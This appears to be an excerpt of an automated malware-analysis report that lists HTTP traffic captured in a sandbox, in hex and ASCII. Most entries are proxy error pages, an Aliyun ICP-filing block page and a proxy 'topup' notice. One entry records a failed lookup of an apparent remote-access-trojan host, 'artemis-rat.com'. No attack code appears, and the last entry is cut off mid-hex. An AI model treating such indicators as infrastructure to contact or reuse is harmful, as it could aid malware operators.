                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 07:37:17 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:18 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 07:37:18 GMTContent-Length: 69Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 32 37 2e 30 2e 30 2e 31 3a 35 33 3a 20 73 65 72 76 65 72 20 6d 69 73 62 65 68 61 76 69 6e 67 0a Data Ascii: dial tcp: lookup artemis-rat.com on 127.0.0.1:53: server misbehaving
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 07:37:18 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:18 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 